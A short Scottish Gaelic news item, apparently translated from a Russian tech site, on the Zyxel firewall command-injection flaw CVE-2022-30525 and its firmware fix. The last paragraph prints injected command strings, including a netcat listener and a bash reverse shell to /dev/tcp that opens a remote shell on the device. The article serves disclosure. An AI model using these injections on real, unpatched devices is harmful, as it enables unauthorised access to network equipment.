Chaidh so-leòntachd èiginneach (CVE-2022-30525) a chomharrachadh ann an innealan Zyxel den t-sreath ATP, VPN agus USG FLEX, air an dealbhadh gus obrachadh ballachan teine, IDS agus VPN a chuir air dòigh ann an iomairtean, a leigeas le neach-ionnsaigh bhon taobh a-muigh còd a chuir an gnìomh air an inneal gun chòraichean neach-cleachdaidh gun dearbhadh. Gus ionnsaigh a dhèanamh, feumaidh neach-ionnsaigh a bhith comasach air iarrtasan a chuir chun inneal a’ cleachdadh protocol HTTP/HTTPS. Tha Zyxel air an so-leòntachd a shocrachadh ann an ùrachadh firmware ZLD 5.30. A rèir seirbheis Shodan, an-dràsta tha 16213 innealan a dh’ fhaodadh a bhith so-leònte air lìonra na cruinne a bhios a ’gabhail ri iarrtasan tro HTTP / HTTPS.
Tha gnìomhachd air a dhèanamh le bhith a’ cur òrdughan air an dealbhadh gu sònraichte chun neach-làimhseachaidh lìn /ztp/cgi-bin/handler, ruigsinneach gun dearbhadh. Tha an duilgheadas air adhbhrachadh leis an dìth glanadh ceart de pharamadairean iarrtas nuair a thathar a’ cur an gnìomh òrdughan air an t-siostam a’ cleachdadh a’ ghairm os.system a thathar a’ cleachdadh anns an leabharlann lib_wan_settings.py agus air a chur gu bàs nuair a thathar a’ giullachd an obrachaidh setWanPortSt.
Mar eisimpleir, dh’ fhaodadh neach-ionnsaigh a dhol seachad air an t-sreang “; ping 192.168.1.210;" a bheir gu buil an àithne “ping 192.168.1.210” air an t-siostam. Gus faighinn chun t-slige àithne, faodaidh tu “nc -lvnp 1270” a ruith air an t-siostam agad, agus an uairsin ceangal cùil a thòiseachadh le bhith a’ cur iarrtas chun inneal leis an '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.
Source: fosgailtenet.ru